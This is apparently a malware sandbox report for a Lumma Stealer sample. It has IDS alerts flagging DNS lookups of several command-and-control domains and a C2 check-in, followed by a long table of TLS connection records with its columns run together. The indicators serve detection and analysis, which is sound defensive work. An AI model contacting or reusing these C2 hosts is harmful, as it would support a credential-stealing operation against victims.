2024-10-03T16:09:17.341243+0200 | 2056070 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pumpkinkwquo .shop) | 1 | 192.168.2.6 | 51551 | 1.1.1.1 | 53 | UDP
2024-10-03T16:09:17.352943+0200 | 2056068 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abortinoiwiam .shop) | 1 | 192.168.2.6 | 59301 | 1.1.1.1 | 53 | UDP
2024-10-03T16:09:17.363756+0200 | 2056064 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (surroundeocw .shop) | 1 | 192.168.2.6 | 59846 | 1.1.1.1 | 53 | UDP
2024-10-03T16:09:17.375637+0200 | 2056066 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covvercilverow .shop) | 1 | 192.168.2.6 | 59163 | 1.1.1.1 | 53 | UDP
2024-10-03T16:09:19.961621+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49707 | 104.21.42.210 | 443 | TCP
2024-10-03T16:09:19.961621+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49707 | 104.21.42.210 | 443 | TCP

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:16.494369030 CEST443496994.175.87.197192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:16.494427919 CEST49699443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:16.494436979 CEST443496994.175.87.197192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:16.494558096 CEST443496994.175.87.197192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:16.494606018 CEST49699443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.059627056 CEST49699443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.059663057 CEST443496994.175.87.197192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.059678078 CEST49699443192.168.2.64.175.87.197
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.059686899 CEST443496994.175.87.197192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.414846897 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.414890051 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.414983988 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.418160915 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.418179989 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.089164019 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.089308023 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.095769882 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.095787048 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.096227884 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.144757032 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.191406965 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.615830898 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.615860939 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.615900993 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.615916967 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.615936995 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.615976095 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.615993977 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.616009951 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.616009951 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.616009951 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.616041899 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.616041899 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.710803032 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.710825920 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.710890055 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.710921049 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.710959911 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.711072922 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.716229916 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.716314077 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.716322899 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.716346979 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.716375113 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.716573000 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.719237089 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.719253063 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.719289064 CEST49705443192.168.2.6104.102.49.254
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.719296932 CEST44349705104.102.49.254192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.742166042 CEST49707443192.168.2.6104.21.42.210
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.742245913 CEST44349707104.21.42.210192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.742327929 CEST49707443192.168.2.6104.21.42.210
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.746473074 CEST49707443192.168.2.6104.21.42.210
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.746515989 CEST44349707104.21.42.210192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:19.224025011 CEST44349707104.21.42.210192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:19.224194050 CEST49707443192.168.2.6104.21.42.210
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:19.227691889 CEST49707443192.168.2.6104.21.42.210
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:19.227715969 CEST44349707104.21.42.210192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:19.228132010 CEST44349707104.21.42.210192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:19.237915993 CEST49707443192.168.2.6104.21.42.210
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:19.237916946 CEST49707443192.168.2.6104.21.42.210
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:19.238099098 CEST44349707104.21.42.210192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:19.961688042 CEST44349707104.21.42.210192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:19.961905956 CEST44349707104.21.42.210192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:19.961977005 CEST49707443192.168.2.6104.21.42.210
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.029611111 CEST49707443192.168.2.6104.21.42.210
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.029691935 CEST44349707104.21.42.210192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.029737949 CEST49707443192.168.2.6104.21.42.210
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.029759884 CEST44349707104.21.42.210192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.262137890 CEST49708443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.262176991 CEST44349708172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.262228966 CEST49708443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.266112089 CEST49708443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.266129017 CEST44349708172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.743350029 CEST44349708172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.743875980 CEST49708443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.743899107 CEST44349708172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.745589018 CEST44349708172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.745649099 CEST49708443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.748811007 CEST49708443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.748842955 CEST49708443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.748898983 CEST44349708172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.748907089 CEST49708443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.748984098 CEST49708443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.749188900 CEST49714443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.749219894 CEST44349714172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.749274015 CEST49714443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.749449015 CEST49714443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.749461889 CEST44349714172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.211600065 CEST44349714172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.820513010 CEST4434971835.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.820544004 CEST49718443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:22.820568085 CEST49718443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.251988888 CEST44349721172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.253933907 CEST49721443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.253947973 CEST44349721172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.255373001 CEST44349721172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.255445957 CEST49721443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.255847931 CEST49721443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.255866051 CEST49721443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.255904913 CEST49721443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.255928993 CEST44349721172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.255983114 CEST49721443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.256237984 CEST49722443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.256273985 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.256372929 CEST49722443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.256572008 CEST49722443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.256587029 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.742012024 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.742263079 CEST49722443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.742300034 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.743357897 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.743443966 CEST49722443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.744019032 CEST49722443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.744136095 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.744309902 CEST49722443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.744323015 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.790827990 CEST49722443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.885389090 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.885504007 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.885559082 CEST49722443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.885586023 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.885662079 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.885708094 CEST49722443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.885715961 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.885833979 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.885946035 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.885993004 CEST49722443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.886003971 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.886045933 CEST49722443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.886053085 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.890135050 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.890186071 CEST49722443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.890194893 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.890285969 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.890336037 CEST49722443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.890343904 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.942812920 CEST49722443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.973803997 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.974035025 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.974090099 CEST49722443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.974101067 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.974191904 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.974240065 CEST49722443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.974246979 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.974378109 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.974425077 CEST49722443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.974432945 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.974519968 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.974596977 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.974636078 CEST49722443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.974643946 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.974746943 CEST49722443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.974978924 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.975130081 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.975188017 CEST49722443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.975194931 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.975461006 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.975569963 CEST49722443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.975577116 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.975989103 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.976036072 CEST49722443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.976043940 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.976224899 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.976274967 CEST49722443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.976283073 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.976404905 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.976453066 CEST49722443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.976459980 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.977029085 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.977094889 CEST49722443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:23.977103949 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.029917002 CEST49722443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.029942989 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.065551043 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.065664053 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.065715075 CEST49722443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.065731049 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.065819025 CEST44349722172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.065867901 CEST49722443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.699163914 CEST44349725104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.699266911 CEST49725443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.699569941 CEST49725443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.699569941 CEST49725443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.699611902 CEST49725443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.699670076 CEST44349725104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.699732065 CEST49725443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.699841022 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.699873924 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.699930906 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.699995995 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.700179100 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.700196981 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.747498035 CEST44349726172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.747850895 CEST49726443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.747883081 CEST44349726172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.748801947 CEST44349726172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.748852015 CEST49726443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.749175072 CEST49726443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.749237061 CEST44349726172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.749351978 CEST49726443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.749361992 CEST44349726172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.749469995 CEST49726443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.749488115 CEST49726443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.749842882 CEST49730443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.749870062 CEST44349730172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.749928951 CEST49730443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.750133038 CEST49730443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.750145912 CEST44349730172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.770070076 CEST49731443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.770119905 CEST44349731184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.770198107 CEST49731443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.771306992 CEST49731443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.771336079 CEST44349731184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.776431084 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.776520967 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.776554108 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.776582956 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.776608944 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.776618004 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.776652098 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.777010918 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.777070045 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.777080059 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.777143002 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.777194977 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.777200937 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.777426958 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.777478933 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.777487040 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.829792976 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.829801083 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.863744020 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.863820076 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.863831043 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.863959074 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.863991976 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.863998890 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.864013910 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.864110947 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.864119053 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.864836931 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.864908934 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.864916086 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.864953041 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.864993095 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.865000963 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.865231037 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.865262032 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.865282059 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.865291119 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.865361929 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.865856886 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.866203070 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.866236925 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.866257906 CEST49723443192.168.2.6104.18.94.41
